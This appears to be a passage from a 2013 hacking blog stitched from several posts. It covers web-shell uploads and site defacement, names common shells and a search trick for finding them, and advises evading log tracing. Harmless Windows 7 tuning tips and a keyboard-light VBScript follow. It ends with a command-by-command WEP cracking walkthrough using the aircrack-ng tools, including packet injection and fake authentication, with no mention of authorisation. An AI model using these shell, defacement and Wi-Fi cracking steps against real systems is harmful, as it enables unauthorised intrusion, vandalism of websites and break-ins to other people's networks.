So that is the DIRECT url to the attachment which is called EXECUTION. In the same way if you execute your shell, it will take you to a webpage where you will see everything thats on the server. And you will have FULL ACCESS to remove/edit/replace/delete the files. So you are another XEO !

Phase 3 : Defacing:

Defacing is a word which means "replacing the current index file with our own index with our motive and slogan on it". So once you have access to the server, you are the king

Different types of shells:

There are many shells available, most of them are public and some of them are private. Most of them does the samething to give you the access of the server. "c99, r57, b0yzone, j32" are some very common and easily available shells.

Where do I get them from?

The best way is Google search with "inurl:c99.txt". You can replace c99 with r57, j32 or anything else.

Important Piece of advice

I would suggest you to download WAMP SERVER, which lets you make your own server on your comptuer. And then try to use shells on it. Which will help you avoid hacking in live environment. Because, if webmaster is smart then, he can simply check the logs for that shell fine and track down your IP which executed the shell. Then you might be in problem.

Thanks for your time to read the article . Hope you liked it . PEACE!

Speed up win7

2013-07-17T08:42:00.005-07:00

Speed up win 7

With the release of Windows 7, Microsoft may just have introduced the fastest operating system in the world. For those speed junkies who are never satisfied, we have provided a few tips that will help you make your PC even faster.

Disable Automatic Disk Defragmentation

The Automatic Disk Defragmentation feature in Windows is designed to maintain the health of the operating system. However, it also makes Windows run a little slower. You can put an end to this by disabling the feature and manually running at your leisure. To do so, click “Start” and select “Computer.” Next, right click on your primary hard drive and select “Properties.” Lastly, select the “Tools” tab, click “Defragment Now” and uncheck the “Run on a schedule” option.

Utilize ReadyBoost

ReadyBoost is a built-in Windows 7 feature that allows you to use a USB flash drive to enhance system performance. How is this possible? The drive itself acts as additional computer memory!

In order to make use of this feature, you will need a USB drive with at least 2 GB of space. From there, you simply connect the drive to your computer, click “Start” and select “Computer.” Next, click on the USB drive and select “ReadyBoost.” Lastly, select “Use this device” and choose as much capacity as possible below on the “Space to reserve for system speed” slide.

Disable Windows Transparency

The transparency of windows is a great perk from a presentation aspect, but this may not be the case for those with older hardware as it can drastically impact performance. The good thing is that transparency can be disabled with ease. Simply right-click on your desktop, select “Personalize,” choose the active theme and then navigate to “Windows Color.” Finally, uncheck the “Enable Transparency” option.

Disable Unwanted Features

There may be numerous Windows 7 features that you really don’t need. These same features could also slow down your computer. To disable them, click on “Start,” choose “Control Panel” and then select “Programs and features.” Next, select the “Turn Windows features on or off” option, navigate through the list and uncheck all the features you want to disable. Once you are done, simply click “OK” to remove those features.

Disable Startup Services

Startup services are notorious for slowing down performance in XP and Vista. The same holds true for Windows 7. You can disable unwanted services by hitting “Start,” typing “msconfig” in the search bar and clicking “Enter.” Click the “Services Tab” on the next window and deselect the services you do not want to automatically run at startup. While this all depends on preference, services that impact performance the most include “Offline Files,” “Tablet PC Input Services,” Terminal Services,” “Fax” and “Windows Search.”

Disable Minimizing/Maximizing Animations

Many users have already fallen in love with the minimizing and maximizing animation effects of windows. However, some may find it irritating after a while as it can eventually lead to slowdowns. If you want to disable this function, hit “Start,” enter “System Properties Performance” in the search bar and click “OK.” On the next screen, deselect the “Animate window when minimizing and maximizing” option and click “OK.”

Update Your Windows 7 Drivers

Lastly, ensure that you have the latest device drivers made specifically for Windows 7. Since your PC can have hundreds of drivers installed in it at any given time, this task can be tedious. Luckily there are 3rd party utilities out thee such as DriverFinder™, which can greatly speed up this process.

Make your keyboard go disco

2013-07-17T08:41:00.000-07:00

This trick just makes your keyboard lights go crazy and do disco. LoL.

The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1.This piece of code makes ur keyboard a live disco..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

2.This one makes it looks like a chain of light….

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop

Instructions:
*paste any of the two above codes in notepad
*Save as “AnyFileName”.vbs
*Run the file
*To stop, launch task manager and then under “Processes” end “wscript.exe”

I hope u would like it..

Feel Free To Share This Post!

Simple wifi Wep cracking

2013-07-17T08:38:00.002-07:00

Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.

Equipments used

Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)

Step 1 – Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6

starts wifi interface in channel 6

Step 2 – Test Wireless Device Packet Injection

aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1

-9 means injection

-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs

airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

-1 means fake authentication

0 reassociation timing in seconds

-e infosec is the wireless network name

-a 00:14:6C:7E:40:80 is the access point MAC address

-h 00:0F:B5:88:AC:82 is our card MAC address

aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

2 – Reauthenticate every 2 seconds.

-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.

-q 10 – Send keep alive packets every 10 seconds.

Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…

Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

You would then look for error messages.

If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…

Run: “tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:

11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station

Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.

If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:1B:11:24:27:2E output*.cap

All Done!